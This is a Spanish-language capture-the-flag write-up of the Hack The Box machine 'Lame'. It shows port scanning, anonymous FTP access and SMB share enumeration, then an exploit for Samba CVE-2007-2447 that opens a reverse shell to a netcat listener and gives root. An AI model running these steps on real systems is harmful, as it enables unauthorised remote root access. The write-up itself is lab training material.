Wirteup Maquina LAME ------------->
hacemos ping para conprobar que tenemos conexión.
ping -c 1 10.10.10.3
Lo primero vamos a descubir que puertos tenemos abiertos con nmap y lo cuardamos en un archivo que llamaremos allPorts
nmap -p- -sS --min-rate 5000 -vvv -n -Pn 10.10.10.3 -oG allPorts
Vemos abiertos los puertos: 21,22,445,139,3632 ahora vemos los servicios expiestos y las versiones pasandole denuevo nmap con un nuevo escaneo:
nmap -sS -sV -p21,22,445,139,3632 10.10.10.3 -oN targeted
Nos muestra los puertos que tenemos abiertos: 21 FTP con el usuario Anonymous activo 22 ssh Openssh 4.7 139 con smb 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.17.115
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Lo mas fácil, sería intentar conectarnos por el puerto 21 por ftp con las creddenciales de anonymous:
ftp 10.10.10.3 21
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:h4nna): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Vemos que no hay nada por ftp.
Intentamos conectarnos por samba puerto 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian:
smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
vemos que en tmp podriamos tener acceso, con la herramienta smbmap, vamos a vuscar CVE
smbmap -h
vemos una ruta de diccionario, grepeamos para encontrar CVE relacionadas con esta vulnerabilidad
cat /usr/share/exploitdb/exploits/unix/remote/16320.rb | grep CVE
[ 'CVE', '2007-2447' ],
[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
buscamos este recurso el el buscador: http://samba.org/samba/security/CVE-2007-2447.html no encontramos nada
buscamos por CVE 2007 2447 Encontramos una web que nos reporta todas las vunerabilidades
Buscamos en el navegador repositorios que nos podamos clonar de github:
git clone https://github.com/amriunix/CVE-2007-2447
me pongo en escucha por el puerto nc -nvlp 444
intento ejecutar el usermap_script.py pero no tengo el pyp3 instalado, lo instalo:
wget http://hackersera.com/get-pip.py
sudo python3 get-pip.py
no me lo reconoce, le paso:
atp --fix-broken install
esto era lo que fallba, le instalo la libreria smb al pip3:
pip3 install pysmb
ahora siiii
me pongo por escucha con el:
nc -nlvp 4444
en otra terminal:
python3 usermap_script.py 10.10.10.3 139 10.10.17.115 4444
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
por fin:
whoami
root
tengo que expawnearme una shell:
python -c 'import pty; pty.spawn("/bin/sh")'
ls -la
cd root
cat root.txt
maquina owned!